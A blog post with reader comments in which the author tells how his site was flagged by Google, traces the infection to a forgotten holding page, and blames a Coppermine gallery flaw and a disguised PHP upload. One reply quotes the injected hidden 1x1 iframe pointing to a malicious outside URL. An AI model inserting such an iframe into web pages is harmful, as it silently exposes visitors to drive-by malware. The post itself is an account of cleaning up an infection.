Thanks to an email from Jules, I finally got to the bottom of this affair. It was Jules’ email that pointed me in the right direction. It seems that I had been infected by this.
When Google first contacted me, they referred to badware on Felix Domesticus and as I pointed out before, this had suffered problems with an upgrade, so the scripts were all over the place. Having rebuilt it, I checked it and it was clean. As it turns out, it never was infected in the first place.
I subsequently noticed that this place; longrider.co.uk/blog was also showing a warning, so I checked out that, too and found nothing. Scans of both sites revealed them both to be clean. My conclusion that the googlebot was over reacting seemed to be confirmed by others experiencing similar difficulties. I asked Google to review my sites and they were given a clean bill of health.
Consequently, when Jules advised me that Google were once more labelling this site as dangerous, I was, understandably annoyed. We had been through all this, and I was not looking forward to trawling through pages of script looking for a Will o’ the Wisp again. In his email, Jules told me that it was my main page that was infected. So, I went though index.php, header.php, sidebar.php and footer.php to no avail. I ran it through spybye.org and it came out as clean. I did the same for Felix Domesticus just in case. Again, clean. Then it hit me… Did Jules mean longrider.co.uk/index.htm? This is nothing more than a blank holding page that I never use. Yup, that was it. As it turned out the compromised file was hiding in plain sight.
So, having found it at last and removed it, I can ask Google to review it again. How do I feel about my annoyance with Google now that their bot has been shown to be correct? Still annoyed, frankly. If their information had been more specific rather than downright misleading, I’d have discovered the malicious code more quickly. Simply telling me that there is something, somewhere on my site is less than helpful. Telling me that it is on one site when it is on another is misleading to the point of being completely useless. I’m reasonably tech savvy, but malicious codes and hacking are not something with which I am familiar, so if I’m to trawl through the site, it helps to know what I am looking for. Jules’ link gave me that clue, so when spybye picked up the URL, I found it relatively easily.
So, Google, tell me what I am looking for and tell me with some degree of accuracy, where I should be looking and I won’t waste hours of my time on a fruitless search through lines of code that are perfectly okay.
As it turns out, the risk was relatively low anyway – Longrider Blog and Felix Domesticus were clean. If you do a search on Longrider, it is this place that comes up, not the holding page. So those of you who came straight here, there never was a risk to you.
It was annoying, certainly. Out of interest, in what way was your index.htm bad?
An iframe tag had been inserted:
[iframe src=’http://ccfelomvhk.com/dl/adv542.php’ width=1 height=1][/iframe]
Not hosting a website, I have to ask. Is this a customer service complaint?
Do you pay google to link to your site?
If not, surely they don’t have to really care where the problem is on your site, or even bother if they link to it?
Happy to help…& you may want to check here.
Coppermine is possibly a vulnerability.
James – no, I don’t pay them, which is just as well, given that they say I should allow several weeks for them to review the site. That, frankly, is piss-poor service, paid or not. However, they are complaining about badware on my site and expect me to do something about it. Reasonable enough. It is equally reasonable of me to expect some sort of clue as to what I should look for and where. Giving me blatantly misleading information helps no one.
Jules, thanks again. Yes, it looks like Coppermine was the route in. I found a rogue image file that was a php file in disguise – gain, once I knew what I was looking for, it was simple enough to find it. None of the PHP files had been compromised, though. Having said that, I upgraded a few days ago, so maybe that wiped the rogue code away. Anyway, I’ve removed Coppormine for the moment. It does seem the safest option.
I’ve noticed Coppermine has had some bad security issues. It’s a shame – I’d like to offer it as part of my hosting service, but on this record it’s not viable.
Peter Risdons last blog post..Ineffable
Peter, yes. I won’t be reinstalling it. I followed the link Jules gave to the support forum. Frankly, I was disturbed by the approach these people have towards their customers. Yes, I know it isn’t paid and they are volunteers, but that does not excuse bullying people to the point where they are apologising for asking a perfectly reasonable question. One user, Miriam, explained in some detail why their behaviour was so bad – with petty, childish rules and penalties, that people were afraid to ask questions. This, frankly, is disgraceful behaviour.
The admin admonished one person for providing details about the exploit’s payload – how it was disguised and where to find it. The reason he was admonished was because those details will not always be the same. So fucking what? That user gave me the information that I needed to find the payload on my site. Sure, the filename was different, but I found it. The admin on that forum is one of the most obnoxious, self-righteous arrogant little creeps I’ve come across in a long time. Even if Coppermine was made 100% secure, that little prick is the reason I would never use it again. What a jerk!
Update – I notice that someone has experienced another attack following the issue of the patch. So, I guess the current best practice is to leave Coppermine well alone…
Well said about the code of conduct. Too many interfering busybodies. I just hope this nanny state/Big Brother government doesn’t take up regulation of the net/blogging as some form of holy crusade.